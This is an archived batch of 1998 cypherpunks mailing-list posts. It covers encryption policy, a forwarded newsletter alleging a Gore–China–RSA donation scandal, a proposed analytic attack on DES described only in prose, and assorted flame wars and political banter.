In-Reply-To: <199809150349.XAA28692@dewdrop2.mindspring.com>
Message-ID: <35FE8B14.FBA@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young wrote:
> 
> We attended Defense Secretary Cohen's talk today at the Council on
> Foreign Relations in New York City on "Security in a Grave World."
> 
> While not included in the prepared text, Secretary Cohen remarked
> in the Q&A on terrorism and encryption policy that Americans will
> have to decide ?how much? privacy they will be willing to give up for
> protection against terrorism...
>
zero




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 15 Sep 1998 11:01:48 +0800
To: Richard.Bragg@ssa.co.uk
Subject: Re: Joe Farah 9/14 (Pppbbbttt)
In-Reply-To: <80256680.003A249A.00@seunt002e.ssa.co.uk>
Message-ID: <35FE8E27.542C@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard.Bragg@ssa.co.uk wrote:
> 
> >>Almost 60 percent of those polled said they thought Clinton was fit to be
> >>president. By what standard? That's the trouble. Americans have no
> >>standards -- no unchangeable yardsticks by which they measure right and
> >>wrong, truth from fiction.
> 
> >By *their* standard, by their own personal judgement. There's no moral
> >yardstick, and God help us if there is in the future. Who makes the
> >yardstick? Who sits down and says, "This is the moral standard in this
> >country, abide by it or suffer the consequences"?
> 
> Sorry but there are absolutes and there is a moral yardstick.  Whether this
>  is accepted or not is beside the point.
> 
> There has to be absolutes otherwise any action can be excused (or damned).
>   The real cry should be
> "God help us to instigate Your yardstick".  God doesn't change and neither
> does His measure.
> 
> 1)Love the Lord, with all your heart, with all you soul with all your mind
> and all your strength
> 2)Love you neibour as yourself.
> 
> Everything else hangs on these.
>
BULLSHIT
BULLSHIT
BULLSHIT
Grow Up
You're a customs inspector, what?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 15 Sep 1998 11:01:29 +0800
To: Terry Leininger <cypherpunks@Algebra.COM
Subject: Re: Zipped Starr Report
In-Reply-To: <35FEA2F2.70758DE5@moraine.tec.wi.us>
Message-ID: <v03130314b2244079496a@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:25 AM -0700 9/15/98, Terry Leininger wrote:
>>You are all writing about Clinton and Monica et al. Dunno what this
>does here
>>but anyway, let me add to the noise:
>
>>Is it possible to download the Starr report somewhere, zipped and
>prepared for
>>offline reading?
>

Don't you mean _unzipped_?


--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 15 Sep 1998 08:24:10 +0800
To: AIMSX@aol.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
In-Reply-To: <33ec7cbb.35fe5849@aol.com>
Message-ID: <35FE67CA.F1CCCB14@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



AIMSX@aol.com wrote:
> 
> Obviously you have a very high opinion of yourself and a low opinion of people
> who use AOL.  Contrary to popular belief, there are a few intelligent people
> on AOL, but it looks as if you are too egotistical to realize that.
> 
> Have you ever thought to look at your own mistakes before you publicize
> everyone else's to the world?  Are you just suffering from some sort of
> dillusion of grandeur - thinking you are better than everyone else.  Things
> like this are what many wars were started over, I am so happy the internet
> (hopefully) won't start a war in the real world.

Right.  Considering the scum that have drifted on here from AOL, I'd say
there's a distinct pattern.  As an EX-AOL user I can attest to the fact that
AOL is prime grade USRDA shit.  At the time I got nothing but busy signals and
crashes, when I logged back in, I was told I was already logged on and had to
call the customer unsupport people to get credit for my hours used by a ghost
connection.  Further, in the last few weeks I had my account, I received
hundreds of spams, the "You've Got Mail" soundbite caused me to twitch every
time I heard it.

Paying $20/month for shit service with a shit browser and shit connectivity
isn't my idea of a good ISP.  A few weeks after, I found a local ISP that gave
me a shell account for $10/month and I got no busy signals and no bullshit
software and no craploads of downloads of images ("artwork") or fifty ads
popping in my face upon connecting.

So yeah, maybe there are "smart" people on AOL, but they're clueless when it
comes to ISP since they're using the worst of the worst.

I don't speak for that "nobody" but I will speak for myself and will speak from
PERSONAL experience.  Aol is shit.  Anyone who is stupid enough to put up with
shit service is either masochistic or isn't aware they're getting shit service,
no matter how intelligent they may otherwise be.  besides, from the cluless
fuckwads that have indeed drifted here, I'd sooner hug the hotmail users, even
the single celled one who spews about Misty than see an AOL luser's email
address in a post!

If you're so smart, find a local ISP who will give you better service and costs
less.  Shit, if you insist on paying $20/month and $5 hour, tell you what,
switch to a cheaper ISP and send me the extra $5/hour you are now wasting, I
sure could use the money!

Just my $0.02 worth of flames.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Tue, 15 Sep 1998 09:43:40 +0800
To: nnburk@cobain.HDC.NET>
Subject: RE: Predictions: Crime and Criminal Justice in the 21st Century
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8418@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> nnburk[SMTP:nnburk@cobain.HDC.NET] posted 10 predictions
about life in the USA  for the next 10 or 15 years.

They are, of course, nothing but descriptions of what's been going
on for the last  30-40 years. This isn't prediction, it's extrapolation!

As so often the people will always win when playing
"cheat the prophet". Whatever really  happens next year 
the chances are it won't be  exactly the same as what happened 
last year.

Ken 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<tubc50u4@auto.sixdegrees.com>
Date: Tue, 15 Sep 1998 08:57:40 +0800
To: "Joe Cypherpunk"<cypherpunks@toad.com>
Subject: Harald Fragner
Message-ID: <199809151350.GAA08886@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick update from sixdegrees(tm). Unfortunately Harald 
Fragner (harald@fragner.net) asked not to be listed as your 
contact with sixdegrees.

We also wanted to make sure you were aware that you currently 
have no other confirmed contacts, so it will be hard for you to
have a productive sixdegrees experience. As you probably know, 
without any confirmed contacts, you won't get any results from our 
networking searches. 

So, we just wanted to recommend that you head over to 
http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
to list additional relationships. 


====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================


E.DB.BRESP.3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 15 Sep 1998 09:03:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: VP GORE'S CHINA SCANDAL
Message-ID: <v04011712b2242429a42f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Tue, 15 Sep 1998 05:33:46 -0400 (EDT)
To: ignition-point@majordomo.pobox.com
From: softwar@us.net (CharlesSmith)
Subject: IP: VP GORE'S CHINA SCANDAL
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: softwar@us.net (CharlesSmith)

http://www.worldnetdaily.com

According to Chinese General Sun Tzu "All war is based on
deception."  Tzu wrote those words over 2,000 years ago and his
first rule of war still applies today.

For example, a hidden November 1994 letter written by DNC donor
Sanford Robertson to President Clinton that clearly details the
sale of Commerce trade trips for campaign donations.  Robertson
was so bold as to include a telling "P.S." where he notes for
Clinton that "Bob Rubin" turned out the "Silicon Valley" at a
Robertson sponsored fundraiser that took in "$100,000" for
California Senator Feinstein.  Of course, neither Robertson nor
current Treasury Secretary Rubin expected that letter to be
revealed.

In November 1995, Vice President Gore called Sanford Robertson
from the White House and asked for a $100,000 donation.  In
January 1996 Robertson obliged and kicked in $80,000 soft and
$20,000 in so-called "hard" donations to the Clinton/Gore
campaign.  The fact that Gore made the call from inside the
White House is the least of his legal problems.

In 1993 Clinton named Gore to head U.S. export policy for
encryption technology in a TOP SECRET order written by National
Security advisor Anthony Lake.  A 1996 secret memo on a secret
meeting of DCIA Deutch, FBI Director Freeh and Attorney General
Janet Reno states "The Vice President chairs the senior group
that set the Administration's encryption policy; since Februarcy
1994 it has been supported by a working group co-chaired by NSC,
and OMB, composed of NSA, CIA, FBI, State, Commerce (BXA, NIST),
and Justice."

In 1995 Sanford Robertson also had a big financial interest in
the U.S. computer security industry.  Robertson's investment
firm had hundreds of millions of dollars tied up in a
Massachusetts based computer company named Security Dynamics
Inc. (SDI).  Thus, in 1995 Gore had direct control of policy
that also affected Robertson financially.

Security Dynamics was able to import computer security hardware
manufactured in China.  SDI secured Hong Kong electronics maker
RJP Industries to produce electronic computer security cards for
sale in America.  The Chinese manufactured cards are sold to
major defense contractors, medical institutions and the U.S.
government.

Hong Kong millionaire Raymond Hung also owns RJP.  Hung
manufactured the security cards in two factories leased directly
from the China National Electronics Import/Export Company
(CNEIEC), a business owned by the People's Liberation Army.
Thus, the computer security cards imported and sold here in the
U.S. were built on a Chinese Army assembly line.

Hung also owned a U.S. based company called Quorum International
that went bankrupt in 1996.  The company left millions in bad
debt in Arizona and California.  Yet, Hung was able to donate
over a million dollars to the Special Olympics, donate a temple
to communist China, and have his photo taken with Arnold
Schwarzenegger all only days before declaring bankruptcy.

Hung is also reported to have set up dozens of shell "front
companies" offshore.  These companies allegedly sell cheap
Chinese products imported by Hung who declares bankruptcy,
citing Chinese taxes on the imports.  Hung, of course, splits
the "taxes" with the Chinese government, and returns to America
to purchase hard assets such as real estate.  Despite all this
Hung remains un-investigated by the Clinton administration.

Hung's close working relationship with China and the Clinton
administration raises another question...  Could there be a
"secret" back door embedded in imported hardware or software,
waiting like a TROJAN HORSE, brought safely inside the secure
walls by a paying customer?  Could a hidden SNIFFER be hunting
down passwords, code keys and sensitive data?

"Absolutely," stated Info-warfare expert Winn Schwartau.  "I
call it 'pro-active' defense - you'll find it referenced in my
original book (Information Warfare)."

"Chips are made of silicon," explained Schwartau.  "If you buy
hardware the only way to tell exactly how it works is with a
destructive test.  You tear the chip apart, layer by layer.
This is not only difficult but expensive.  Can it happen?  Just
look at the multitude of hardware and software products
maintained outside of the United States.  How many of them are
'proprietary' designs that have never been viewed inside the
U.S.?"

"It is possible," agreed Forrest Mimms, a leader in the U.S.
electronics engineering and well-known author.  Mimms is best
known to electronics hobbyists worldwide for his series of books
that populate Radio Shack.

"I would not be surprised to find a back door put in by the
Chinese government," stated Mimms.  "Go to Wal-Mart and you'll
find hundreds of commercial electronics products made by Chinese
government factories.  In fact, I would not be surprised to find
a back door put in by an independent [rouge or criminal]
operation."

"Yes.  It is always possible to slip a Trojan horse into
cryptography products, both hardware and software," stated Bruce
Schneier, President of Counterpane Systems and author of the
best selling book on computer security APPLIED CRYPTOGRAPHY.

"Unless the user takes the time to reverse-engineer the product
- - much easier to do in software than in hardware - - he is
essentially trusting that the manufacturer is behaving
honestly," stated Schneier.  "The NSA has been rumored to have
convinced several cryptography hardware companies world-wide to
install Trojan horses that effectively 'leak' secrets as the
hardware is used."

The Chinese Army, Sanford Robertson, Al Gore and Ron Brown
shared an interest in computer security technology.  California
based RSA Inc. is the only U.S. company that has ever been able
to secure any export deal on encryption with China.
Documentation held by the Commerce Department and taken by
former DNC fundraiser Ira Sockowitz shows that RSA was able to
obtain a trade deal with the Chinese government through a
Commerce sponsored trade conference to Beijing in October 1995.
In fact, both the Chairman of RSA, Jim Bidzos, and Ron Brown met
in October of 1995 with Madam Wu Yi, head of China's MOFTEC
(Ministry of Foreign Trade and Economic Cooperation).

Al Gore also had previous legal contact with RSA Inc. in 1994.
According RSA CEO James Bidzos, in March 1994 Gore sent
government lawyers to RSA in a failed effort to purchase patents
on encryption technology held by his company.  Curiously, the
envoy Gore selected to send was John Huang's boss, Commerce
Counsel Ginger Lew.  Even more curious is the fact that Lew
claimed to know nothing about encryption in her deposition for
Judicial Watch.

Her lack of computer security knowledge is puzzling because Lew
also possessed a 1994 document detailing penetrations of U.S.
government computers using "back-door" and "SNIFFER" programs
installed by unknown hackers.  The document was returned in
response to a Freedom of Information Request.  Ms. Lew currently
works at the Small Business Administration and has refused my
request for an interview.

In February 1996, only days after Robertson had kicked in his
$100,000 to the Clinton/Gore campaign, RSA announced the China
encryption export deal.  In April 1996, Robertson's Security
Dynamics Inc. bought RSA for $296 million above the stock value.
Robertson's investment firm was paid $2 million just to write
the merger document.  Thus, Robertson financially benefited from
the same company that Gore had previously engaged in secret
government negotiations.  Robertson gained $2 million for a
$100,000 investment in less than 90 days.

How deeply involved was Robertson with party officials?
Perhaps, the real question is which party?  Democrat or
Communist?  In an April 1994 letter Robertson reminded Brown of
scheduled money-raising events for the DNC and of his efforts
for DNC candidates.  "P.S." Robertson wrote to Brown.  "It has
been fund raising season out here for the Senate and we've had
events at our home for Feinstein, Lieberman, and Cooper.  I wish
you were still head of the DNC for the December elections, but
you are obviously doing a great job at Commerce."

In the same letter Robertson also noted his influence in the
Chinese communist party.  In April 1994 Robertson informed
Brown of his successful effort to hire the son of a major
Chinese Communist leader.  "We have recently hired Bo Feng the
son of Feng Zhijun the vice chairman of the China Democratic
League and a member of the Standing Committee of the National
People's Congress."

On August 18, 1998 this author filed suit in Federal Court
against the Clinton administration for illegally withholding
documents.  The documents in question were discovered at the
Commerce Department in response to a Freedom of Information
Request on Loral CEO Bernard Schwartz and DNC donor Sanford
Robertson.

At first, the Commerce Department refused to release the "22"
documents because they were being withheld by unspecified "other
agencies" for "consultation".  On May 18, 1998 the Commerce
Department released one of the 22 documents.  The single
document returned was the bio of W. Bowman Cutter, Deputy
Assistant to the President for Economic Policy, written by the
White House.

"Bo" Cutter, "Bob" Rubin, Al Gore and Ron Brown were all tasked
to encryption export policy in the 1993 Top Secret order from
Bill Clinton written by Tony Lake.  Bo, Bob, Al and Ron were
part of the encryption task force detailed in the 1996
CIA/FBI/DOJ meeting.  "Bo" Cutter's boss, now Treasury Secretary
"Bob" Rubin, raised the 1994 $100,000 from Sanford Robertson
while working inside the White House - just like Al Gore in
1995.  All of these fine gentlemen were also making secret
export policy... including Sanford Robertson.

In addition, according to the Commerce Department FOIA officer,
the remaining 21 documents were being withheld by the White
House.  However, the White House is NOT an agency.  My source on
this legal "Catch-22" is the White House legal counsel for Vice
President Al Gore.  In response to a 1997 FOIA request Vice
President Gore's Deputy Counsel Elizabeth Brown wrote "Please be
advised that FOIA applies to only records maintained by
'agencies' with in the Executive Branch.  The Office of the
President and the Vice President ... are not 'agencies' for the
purposes of this law.  Therefore, your request must be denied."

The Clinton administration caved instead of facing embarrassment
in court.  The remaining documents withheld by the White House
have been released.

Both Bernard Schwartz and Sanford Robertson were given the
detailed dossiers of the Chinese leadership from President Jiang
Zemin, and MOFTEC's Madam Wu Yi - down to the local communist
mayor of Shanghi.  The new documents include information on such
communist officials as Hu Qili - Minister of Electronics
Industry - a former radical Red Guard member of the Chinese
Youth movement.  According to the hidden documents, Qili argues
"that military electronics are a key technology necessary for
winning modern warfare."

According to Sun Tzu, all war is based on deception.  War,
according to Von Clausewitz, is also merely an extension of
politics.  The war of Clinton deception continues to this day.
The administration and its agencies are continuing to withhold
documents from this author, the House National Security
Committee, and the House Government Oversight Committee.  The
White House is engaged in a cover-up of illegal activities.
Evidence hidden in a deliberate and planned scheme to conceal
crimes by officials currently in power.

==============================================================
source documents * = new

- Robertson letters to Brown & Clinton

http://www.softwar.net/rscot.html  <--- text version
http://www.softwar.net/rsco.html   <--- jpeg version

- SECRET 1993 order on encryption by Anthony Lake

http://www.softwar.net/not4u2c.html

- Secret 1996 DCIA Deutch/FBI Freeh /AG Reno meeting

http://www.softwar.net/docciat.html  <--- text version
http://www.softwar.net/doccia.html   <--- jpeg version

- * Snips from the SEC - official RSA/SDI merger document
RJP, China, MFN treaty & $2,000,000 payment to Robertson
& Stephens for writing merger document.

http://www.softwar.net/sdi.html

- * Raymond Hung with Arnie, wife with $1,000,000 check, wife
with Shriver, temple donated to PRC and article ref.

http://www.softwar.net/quorum.html

- Interview of RSA CEO James Bidzos

http://www.softwar.net/bidzos.html

- * Documents held by Ginger Lew on back-doors and sniffers

http://www.softwar.net/lew.html

- * Documents on encryption written by Al Gore & 1997 FOIA
rejection by Gore's legal counsel

http://www.softwar.net/al2000.html

http://www.softwar.net/gore.html

http://www.softwar.net/vp.html

- * Ron at CHINA WORLD - Oct. 1995 JCCT meeting with Wu Yi

http://www.softwar.net/ron.html

- * White House Bio of "Bo" Cutter

http://www.softwar.net/boknows.html

- * snips from White House documents & SOFTWAR action, bios
of Jiang Zemin, Wu Yi, Hu Qili, and Huang Ju (mayor of Shanghi)

http://www.softwar.net/white.html

================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
5A7061066259AAE7F805238B655FF97BB1EAE42FB1C6F167AFD9964D21E2BD4A
BABA05AC8A30EFA7B576D199F6F01DEA3460074026CD09F27A36919487341214
57401400416BC39E
================================================================
SOFTWAR EMAIL NEWSLETTER                            09/15/1998
***  to unsubscribe reply with "unsubscribe" as subject    ***
================================================================






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 15 Sep 1998 09:36:02 +0800
To: Bill Stewart <cypherpunks@cyberpass.net
Subject: Re: Fwd: WHITE HOUSE MULLS NEW INTERNET TAX PROPOSAL  from edupage
In-Reply-To: <3.0.5.32.19980915001432.008abb40@idiom.com>
Message-ID: <199809151435.KAA25939@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:14 AM 9/15/98 -0700, Bill Stewart wrote:

>Ira Magaziner, President Clinton's senior Internet advisor, has proposed a 
>new plan for tracking and taxing goods sold over the Internet that would use 
>electronic "resident cards" and private-sector escrow agents around the 
>world. Consumers would obtain digital cash at banks that would allow 
>merchants to identify which country the buyer is in, 

And I thought "Monica was having sex with Clinton but Clinton wasn't having
sex with Monica" was the best the joke  meisters at the White House could
come up with.

Does Ira say how the OECD countries were going to mandate a monopoly
payment system?  Seems to me the number of payment systems is rising
towards infinity rather than falling towards unity.

The Ottawa conference is going to be a laugh riot.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 15 Sep 1998 10:21:46 +0800
To: cypherpunks@cyberpass.net
Subject: The DES Analytic Crack Project
Message-ID: <199809151523.KAA13785@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



As some of you may have noticed, a new attempt to crack the Data
Encryption Standard has been started, with a descriptive FAQ located
at the following URL
 
        http://www.cyberspace.org/~enoch/crakfaq.html
 
A while back, after the first DES challenge was announced, a number of
us made the observation that a known plaintext attack on DES,
expressed as a system of a few thousand boolean variables with
constraints in 3-conjunctive normal form, was not too far from the
size and complexity of problems that could be directly solved by
bleeding edge combinatorial algorithms, albeit with signficant CPU and
memory consumption.
 
We thought this would be an interesting result, and generated a number
of problems of various numbers of DES rounds based on the DES
Challenge data, and some not particularly optimized S-Box
representations, and set about the task of solving them, smaller
problems first.  We wrote a lot of code, learned a lot about arbitrary
systems of boolean variables, and after breaking 2-round and 4-round
problems, the first almost instantly, and the second with very
reasonable amounts of resources, set about the task of seeing if we
could break the higher round problems, and immortalize ourselves by
beating DESCHALL to the key.
 
To our very great regret, we did not manage to do this, and once the
$10k prize was claimed, we figured the game was over and returned to
working on other things.  We still thought DES was a problem of
approximately the right size to demonstrate the existence of an
analytical solution which would beat a well-tuned exhaustive search on
a problem of practical interest.
 
Since that time, DES has been broken twice more by exhaustive search,
once by distributed.net, and again by a hardware DES cracking machine
designed by Net legend John Gilmore and the EFF for a non-trivial
amount of money.
 
Remarkably, although most agree DES is dead for new applications, with
Moore's Law and additional hardware crackers being possible today for
much less than the cost of the prototype, it still seems to enjoy a
reputation amongst the public as a cipher that takes 20,000 pentiums
running for half a month or a hardware box with $100k of chips running
for several days to break, neither of which seems to have thrown the
Fear of God into its current users, most notably the Banking Industry.
 
With other analytic attacks like differential and linear cryptanalysis
being really practical only for reduced round DES, and all current
high-profile cracks on production ciphers employing key trial, the
press has latched onto keysize as a synonym for strength, and has made
numerous statements which have reinforced this questionable paradigm
in the minds of the public.
 
We have therefore been taking another look at our idea of a
combinatorial crack of DES, and decided that even with DES having been
cracked three times by key trial, it is definitely a project worth
doing.  This time, rather than working frantically in an unsuccessful
attempt to beat other teams on a public challenge, we wish to finish
up our original efforts, and repeat the three cracks previously done,
this time using our algorithms, and distribute working code
continuously as the project progresses, to sponsors who have donated
some money to defray our costs.  This will offer people the
opportunity to participate vicariously in a fun project which has the
potential to be a genuine paradigm shift in the way the world thinks
about codebreaking.
 
Sometimes, promising areas of research are not followed because of
knowlege of some well-known result which suggests that such
exploration will be unfruitful.  Years ago, for instance, suggestions
that programs could be checked by software for proper behavior, and
run without using protected memory regions, were usually met with
snide comments about the "computer halting problem" and various
adjunct results.  Today, there are many variants of "safe execution"
technology, from prove and carry schemes, to Java bytecode, with a
sound theoretical basis behind them.  None of these is a violation of
the "computer halting problem" results, of course.
 
Similarly, after a large burst of activity decades ago, which resulted
in the notion of NP-Completeness, and various results in computational
complexity theory, suggestions that an analytic solution exists for
some large combinatorial problem of practical interest conjure up
visions of exponential resource utilization, speaker cluenessless, and
the lack of progress on NP=P.
 
For this reason, we feel this project is definitely a Schnelling
Point.  If it works, even badly, people will begin to look at lots of
problems in ways they would not have considered before, and much new
code which improves upon what we have done will be created.  This will
be an irreversible change in the Order of Things.
 
In the several days since we put up our FAQ, we have gotten quite a
few comments, and some concerns.
 
The comments have mostly been along the lines that it is an
interesting, even intriguing project.  The concerns are generally that
we will experience an unexpected "combinatoric explosion" in the
higher round problems, and that no one in their right mind would send
money to a nym, because it might just vanish and be used by the nym to
live in perpetual ecstasy in some place warm and tropical, without the
possiblility of the nym being sued for fraud.
 
While we hope the close coupling between the sponsors and the project
members will eliminate this latter concern, with weekly progress
reports and working code being distributed to permit the sponsors to
reproduce our results as they occur.  If three people are willing to
sponsor and give us the go-ahead to begin, without wanting their money
back if other sponsors do not join, we can probably get through the
minimal S-Box representations and their proof-of-correctness as well
as some cleaned up code for the 2-round problem.  Hopefully we will
then have a reputation with these people which will encourage others
to join in the effort.
 
Clearly, we're after speculative capital, rather than widow and orphan
money, and hope a few of the wealthy older retired (and perhaps even
crusty) engineer types might find this a productive thing to support.
After all, if you've just blown $220,000 on a DES Cracker, making it
$220,500 and getting your very own Schnelling Point in return is
probably a reasonable amount of fun for your money.
 
I'll stop ranting now. :)

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Terry Leininger <tleininger@moraine.tec.wi.us>
Date: Tue, 15 Sep 1998 10:23:39 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Zipped Starr Report
Message-ID: <35FEA2F2.70758DE5@moraine.tec.wi.us>
MIME-Version: 1.0
Content-Type: text/plain






>You are all writing about Clinton and Monica et al. Dunno what this
does here
>but anyway, let me add to the noise:

>Is it possible to download the Starr report somewhere, zipped and
prepared for
>offline reading?


Try   http://www.angelfire.com/wa/starreport/home.html

Couldn't help it...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 15 Sep 1998 09:55:31 +0800
To: cypherpunks@toad.com
Subject: Request to DoD for InfoSec
Message-ID: <199809151446.KAA14702@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



To: kbacon@pagate.pa.osd.mil
From: jya@pipeline.com
Date: Tues 15 September 1998, 09:51 AM
Subject: Interview Request

Kenneth H. Bacon
Assistant Secretary of Defense for Public Affairs
OASD (PA)
1400 Defense Pentagon
Washington D.C. 20301-1400

Dear Mr. Bacon,

Three points of Secretary Cohen's informative talk[*] at the 
Council on Foreign Relations last evening would benefit
by amplification, and I ask your assistance in arranging an
interview with the Secretary to focus on the Department's
policy on information security technology.

1. The first concerns his view on the interdependency of military
and economic affairs for assurance of national security.

1.1 What does he see as the prospect for further declassification 
of restricted defense technology for use by industry for protection 
of information against economic espionage, as exemplified in the 
declassification of the Skipjack encryption algorithm. 

1.2 And what other services and/or technology the defense supply
and intelligence agencies may provide non-governmental customers 
in competition with other nations where closer cooperation between 
such agencies and industry is more common.

2. The second concerns the need for international cooperation
for US defense policy and how that is impacted by publicity and 
criticism of the Echelon electronic intercept program and other
national technical means not customarily discussed in public by 
the Department.

2.1 What are Secretary Cohen's views of programs such as Echelon 
political and international trust issues and what he is his view of European 
calls for investigation of Echelon.

2.2 What are Secretary Cohen's views as a constructive response to 
charges that Echelon and other national technical means are 
offensive military and economic espionage against those from 
whom the US desires defense cooperation.

3. In the Q&A on the topic of terrorism and encryption, Secretary 
Cohen remarked that the American people will have to decide how 
much privacy they are willing to give up in order to be protected from
terrorist threats.

3.1 What are the Secretary's views on how disputes on encryption
policy could be resolved in light of his calls for closer connection
between military and economic interests and for international 
cooperation for defense policy.

Your office has always been exemplary in responding to requests
for information. Thank you very much.


Sincerely,


John Young
JYA/Urban Deadline
251 West 89th Street, Suite 6E
New York, NY 10024

E-mail: jya@pipeline.com
Tel: 212-873-8700
Fax: 212-799-4003

* See: http://jya.com/dod091498.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimg@mentat.com (Jim Gillogly)
Date: Tue, 15 Sep 1998 12:43:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The DES Analytic Crack Project
Message-ID: <199809151742.KAA12178@zendia.mentat.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody said:
> 
> Eric Michael Cordian, emc@wire.insync.net, writes:
> 
> > The concerns are generally that
> > we will experience an unexpected "combinatoric explosion" in the
> > higher round problems
> 
> Unexpected by you, perhaps, but expected by everyone else.  The complexity
> of the expressions should increase exponentially with the number of
> rounds.  Extrapolating from two and four round results to eight and
> sixteen is the wrong model. ...
> 
> Can't you come up with a back-of-the-envelope estimate for the number of
> terms in your sixteen round expression?  Even without fully optimized
> S-box expressions this information would be useful.  If it is greater than
> the number of atoms on Earth then it would be a strong hint that this
> approach won't work.

In the early 1980's I started trying this approach.  I did the
back-of-the-envelope estimate and realized it was too big, but
I thought it worth trying, since if there were a back door in
DES it might manifest itself by a massive collapse in the complexity
of these expressions.  I didn't get far enough into it to decide one
way or the other, since I didn't have a good tool for reducing the
expressions to minimal form.

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 15 Sep 1998 12:05:15 +0800
To: kerrinp@iinet.net.au
Subject: CHRYSLER AWARD NOMINATION STATEMENT
Message-ID: <35FE9AD7.1805@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain



CHRYSLER AWARD NOMINATION STATEMENT
			
American forefathers drafted the Constitution and laws of our country
shortly after having suffered injustice.   Fresh in their minds were
strategies used by their oppressors.  Writers of the Constitution and
laws anticipated ways subvert our system.  Therefore, our forefathers
designed safeguards into our legal system to prevent future injustice.

But these safeguards DON'T appear to be working today.

Morales and Payne designed a strategy using the National Security Agency
[NSA], Sandia National Laboratories, the US Federal Court System, and
publication on Internet to illustrate how the US government system has
deteriorated.

Arthur Morales WAS a supervisor at Sandia Labs in 1991.  Morales and
Manuel Garcia organized a class action lawsuit on behalf of minority and
women against Sandia.

Sandia settled Morales' and Garcia's lawsuit.  Department of Energy
acknowledged from Freedom of Information Act  [FOIA] requests that as
of  December 31, 1995 Morales cost Sandia $567,137 in legal fees.

Sandia retaliated against Morales.  Morales sued Sandia in New Mexico
District Court.  Morales lost

William Payne wrote a technical report describing 'deficiencies'  NSA's
cryptographic algorithms http://jya.com/da/whpda.htm.  Sandia
transferred Payne to break electronics locks for the Federal Bureau of
Invesitgation [FBI].  Payne refused to do illegal  work. 
http://www.jya.com/whp1.htm.

Payne sued Sandia in Federal Court.  Payne lost and court records were
sealed.

FBI agent Bernardo Perez  led a class action lawsuit against the FBI for
race discrimination against Hispanic
FBI agents.  http://www.usdoj.gov/osg/1995/w951482w.txt

Perez won.  Perez was assigned agent-in-charge of the FBI in Albuquerque
for settlement.  But Perez lost
money.

Morales and Payne learned that the FBI extorted an inexpensive from
Perez by telling Perez that the FBI was
GUARANTEED to win on appeal in Federal Circuit.

With Perez' and others knowledge of circuit courts, Morales and Payne
appealed their respective cases pro se to the Tenth Circuit.  

In Payne's case Sandia failed to submit its Brief of the Appellees on
time.  Then falsified its certificate of service when Payne filed to
remand.

